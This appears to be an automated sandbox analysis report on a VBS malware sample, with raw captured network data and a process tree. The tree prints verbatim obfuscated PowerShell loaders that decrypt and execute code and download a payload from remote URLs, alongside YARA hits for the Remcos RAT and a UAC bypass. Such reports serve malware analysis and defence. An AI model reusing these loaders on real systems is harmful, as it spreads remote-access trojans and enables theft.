                                                        2024-07-27 11:31:30 UTC | 16384 | IN | Data Raw: 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 51 2f 72 33 64 37 49 36 31 76 5a 61 2f 51 4f 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 67 63 4d 45 41 51 41 41 32 65 34 50 64 75 4c 72 54 66 54 53 65 44 37 4c 79 38 76 4c 79
                                                        Data Ascii: X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19Q/r3d7I61vZa/QOmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYgcMEAQAA2e4PduLrTfTSeD7Ly8vLy
                                                        2024-07-27 11:31:30 UTC | 16384 | IN | Data Raw: 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 51 2f 36 78 39 76 69 36 30 78 50 2f 34 42 4b 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 4f 64 41 50 64 2f 4d 50 66 74 37 72 55 45 59 48 76 30 63 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 44 34 56 79 2b 76 2f 2f 6d
                                                        Data Ascii: 39/f39/f39/f39/Q/6x9vi60xP/4BKFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWOdAPd/MPft7rUEYHv0cdHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dD4Vy+v//m
                                                        2024-07-27 11:31:30 UTC | 16384 | IN | Data Raw: 74 46 68 30 5a 6c 72 47 57 6e 39 6e 50 56 57 38 70 38 37 54 59 73 78 73 58 31 54 42 42 44 4c 68 54 77 52 72 32 6c 63 78 44 4e 44 75 61 59 2f 6d 78 63 76 34 41 45 63 79 43 65 4f 74 6b 46 39 70 51 6a 75 48 46 66 48 31 47 41 4f 79 4e 35 57 44 62 39 31 51 77 73 4f 71 77 47 55 37 2b 74 33 51 53 57 76 4c 75 32 47 75 6c 70 62 55 65 58 2f 52 63 63 4c 4a 47 41 34 31 5a 33 39 48 50 4e 57 36 65 58 48 71 6d 69 4e 64 2b 71 72 66 4c 68 66 36 33 79 34 58 2b 74 38 75 46 2f 72 66 4c 68 66 36 33 79 34 58 2b 74 38 75 45 36 35 30 38 39 4a 76 52 2f 73 43 4c 4b 32 59 65 43 72 31 30 49 77 69 38 61 69 6a 46 65 44 71 71 2f 6e 58 74 30 79 36 7a 79 34 63 55 37 36 64 4b 4e 79 2f 30 6d 54 71 33 79 34 58 2b 74 38 75 46 2f 72 66 4c 68 66 36 33 79 34 58 2b 74 38 75 46 2f 72 66 4c 68 4a
                                                        Data Ascii: tFh0ZlrGWn9nPVW8p87TYsxsX1TBBDLhTwRr2lcxDNDuaY/mxcv4AEcyCeOtkF9pQjuHFfH1GAOyN5WDb91QwsOqwGU7+t3QSWvLu2GulpbUeX/RccLJGA41Z39HPNW6eXHqmiNd+qrfLhf63y4X+t8uF/rfLhf63y4X+t8uE65089JvR/sCLK2YeCr10Iwi8aijFeDqq/nXt0y6zy4cU76dKNy/0mTq3y4X+t8uF/rfLhf63y4X+t8uF/rfLhJ
                                                        2024-07-27 11:31:30 UTC16384INData Raw: 51 69 59 49 77 69 70 52 53 6b 2f 45 76 77 74 4c 63 49 59 4a 59 59 30 53 53 55 4c 41 50 53 51 4a 32 6c 59 49 34 63 37 62 5a 4c 4c 44 50 44 42 6d 42 67 73 2b 4d 6b 45 4f 42 31 4d 48 63 76 42 72 36 30 37 77 34 33 66 55 31 55 4d 4d 46 46 46 73 71 5a 6d 57 50 4c 51 53 39 71 62 77 67 30 44 6f 36 37 70 52 45 65 75 45 62 65 37 6e 42 79 56 50 51 41 2f 73 72 69 68 46 49 4d 70 4a 47 54 6a 53 30 78 6e 2f 70 76 71 47 43 47 4e 68 73 79 56 2f 54 4c 4f 66 51 77 4f 4f 42 2f 72 66 31 6b 6d 36 76 79 34 62 4d 55 78 74 69 38 38 46 70 72 2b 67 39 6a 46 54 73 67 64 39 57 61 6b 42 4c 6b 68 72 76 6e 73 74 73 44 4f 72 43 76 36 6a 51 52 45 76 35 4a 55 34 63 76 52 6d 43 4d 55 61 77 4a 52 53 77 5a 72 39 72 48 66 4c 44 6a 4a 42 50 6f 5a 6a 42 33 4a 67 4f 67 61 79 32 73 69 30 49 48 56
                                                        Data Ascii: QiYIwipRSk/EvwtLcIYJYY0SSULAPSQJ2lYI4c7bZLLDPDBmBgs+MkEOB1MHcvBr607w43fU1UMMFFFsqZmWPLQS9qbwg0Do67pREeuEbe7nByVPQA/srihFIMpJGTjS0xn/pvqGCGNhsyV/TLOfQwOOB/rf1km6vy4bMUxti88Fpr+g9jFTsgd9WakBLkhrvnstsDOrCv6jQREv5JU4cvRmCMUawJRSwZr9rHfLDjJBPoZjB3JgOgay2si0IHV
                                                        2024-07-27 11:31:30 UTC16384INData Raw: 36 76 34 79 43 2b 48 63 32 32 39 35 61 4e 4a 36 30 38 46 49 72 4a 45 49 6a 2b 30 4c 70 2b 45 61 33 79 37 76 74 69 6a 65 42 2f 39 58 59 71 4a 53 52 48 42 33 36 74 38 6d 69 35 2b 30 77 58 65 33 33 72 59 4a 47 58 61 52 64 57 4c 44 53 4f 2f 49 72 69 61 47 6b 30 56 30 78 50 54 73 72 4d 7a 4c 76 7a 31 43 46 47 31 78 53 32 4e 57 68 31 55 6d 5a 4a 31 70 76 2b 70 62 4b 33 74 59 37 68 62 66 6b 4b 4e 67 6a 79 72 4c 66 30 47 42 54 67 66 36 32 6a 57 43 42 43 4c 4d 54 2b 58 4c 35 69 75 7a 31 7a 45 45 56 39 36 46 54 32 70 50 30 68 67 45 53 67 65 37 4b 51 6d 50 4b 43 4f 62 6b 79 4a 4d 6a 36 48 64 59 37 7a 74 2f 4e 44 38 4f 7a 5a 73 67 38 64 50 4f 54 71 2b 36 34 6e 59 76 68 66 36 33 79 34 58 2b 74 38 75 46 2f 72 66 4c 68 66 36 33 79 34 58 2b 74 38 75 46 2f 72 61 61 38 57
                                                        Data Ascii: 6v4yC+Hc2295aNJ608FIrJEIj+0Lp+Ea3y7vtijeB/9XYqJSRHB36t8mi5+0wXe33rYJGXaRdWLDSO/IriaGk0V0xPTsrMzLvz1CFG1xS2NWh1UmZJ1pv+pbK3tY7hbfkKNgjyrLf0GBTgf62jWCBCLMT+XL5iuz1zEEV96FT2pP0hgESge7KQmPKCObkyJMj6HdY7zt/ND8OzZsg8dPOTq+64nYvhf63y4X+t8uF/rfLhf63y4X+t8uF/raa8W
                                                        2024-07-27 11:31:30 UTC16384INData Raw: 39 35 4e 43 65 51 63 77 74 51 43 73 70 33 4b 54 46 37 42 33 61 37 62 32 57 74 31 2f 6c 6f 6f 4a 46 37 56 65 44 66 4e 78 4b 7a 31 34 44 69 56 45 37 30 62 66 4e 66 70 4a 31 4e 7a 48 6d 34 4a 55 6f 44 42 59 76 2b 35 61 69 58 76 2f 66 4c 73 62 68 67 32 5a 6e 7a 6c 4e 69 39 39 2f 4d 70 75 61 33 4a 59 56 64 6c 63 74 45 31 2f 30 69 51 6d 50 4f 74 59 4c 32 78 4c 46 79 55 4c 42 6a 32 42 39 2f 74 59 4c 30 6e 51 62 53 72 2b 32 35 6f 6d 61 54 6b 66 42 6b 6f 4e 4a 31 30 39 45 52 36 68 6e 76 67 64 54 2b 4a 79 5a 75 44 6c 51 64 6a 6e 77 59 62 31 4b 37 45 36 4c 2b 71 65 71 4f 31 37 7a 55 6e 59 4e 5a 47 6f 58 39 63 38 33 63 71 4a 53 33 79 43 42 65 74 77 75 46 2f 52 54 44 73 65 36 32 69 43 55 41 58 38 4f 48 32 4f 43 6a 67 66 36 32 69 57 52 51 47 64 64 35 4b 2b 4b 6d 6f 4d
                                                        Data Ascii: 95NCeQcwtQCsp3KTF7B3a7b2Wt1/looJF7VeDfNxKz14DiVE70bfNfpJ1NzHm4JUoDBYv+5aiXv/fLsbhg2ZnzlNi99/Mpua3JYVdlctE1/0iQmPOtYL2xLFyULBj2B9/tYL0nQbSr+25omaTkfBkoNJ109ER6hnvgdT+JyZuDlQdjnwYb1K7E6L+qeqO17zUnYNZGoX9c83cqJS3yCBetwuF/RTDse62iCUAX8OH2OCjgf62iWRQGdd5K+KmoM
                                                        2024-07-27 11:31:30 UTC1536INData Raw: 59 59 54 31 6d 56 42 6d 53 6e 4a 45 39 61 66 71 33 79 58 69 31 54 4d 65 54 37 64 6e 4d 57 36 4d 30 73 75 52 6b 6f 4b 32 43 51 35 6d 4f 32 53 31 73 32 53 2f 35 43 68 4f 79 35 68 66 4d 61 39 42 42 4a 34 48 2b 74 57 73 61 48 4b 44 41 6d 66 41 6a 7a 61 34 75 55 4f 6d 42 4d 77 78 38 6f 37 69 7a 42 79 59 33 4f 63 47 42 55 34 5a 59 4a 75 79 6b 67 5a 61 55 6b 64 77 5a 2b 72 66 4a 5a 6b 77 56 46 74 52 6c 61 4d 42 65 46 67 4c 58 33 58 38 33 48 69 68 63 39 65 74 53 31 56 2f 57 64 47 56 6f 31 36 2f 43 73 4d 57 72 36 53 76 50 68 66 32 72 78 41 69 67 32 2b 6d 42 55 38 2f 35 38 55 46 6f 77 72 6d 39 6c 6e 57 42 4d 4a 61 4d 2f 5a 53 7a 42 55 6c 76 44 46 57 57 4a 4b 52 55 6d 2b 76 7a 77 34 58 39 49 6f 42 68 4d 4b 54 4a 67 79 76 7a 77 34 58 2b 4c 2b 5a 7a 44 2b 6b 31 6d 66
                                                        Data Ascii: YYT1mVBmSnJE9afq3yXi1TMeT7dnMW6M0suRkoK2CQ5mO2S1s2S/5ChOy5hfMa9BBJ4H+tWsaHKDAmfAjza4uUOmBMwx8o7izByY3OcGBU4ZYJuykgZaUkdwZ+rfJZkwVFtRlaMBeFgLX3X83Hihc9etS1V/WdGVo16/CsMWr6SvPhf2rxAig2+mBU8/58UFowrm9lnWBMJaM/ZSzBUlvDFWWJKRUm+vzw4X9IoBhMKTJgyvzw4X+L+ZzD+k1mf

                                                        Target ID:0
                                                        Start time:07:30:55
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs"
                                                        Imagebase:0x7ff6a6300000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:07:30:55
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
                                                        Imagebase:0x7ff7be880000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:07:30:55
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:07:31:01
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                        Imagebase:0x8a0000
                                                        File size:65'440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:5
                                                        Start time:07:31:07
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs"
                                                        Imagebase:0x2e0000
                                                        File size:147'456 bytes
                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:07:31:08
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem"
                                                        Imagebase:0x1c0000
                                                        File size:65'440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:07:31:08
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem"
                                                        Imagebase:0xca0000
                                                        File size:65'440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:07:31:08
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jmlaun"
                                                        Imagebase:0xec0000
                                                        File size:65'440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:07:31:09
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\tgqsvxbzg"
                                                        Imagebase:0xb30000
                                                        File size:65'440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:07:31:11
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). 
');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;"
                                                        Imagebase:0x70000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:11
                                                        Start time:07:31:11
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:12
                                                        Start time:07:31:12
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                                                        Imagebase:0x790000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:07:31:34
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
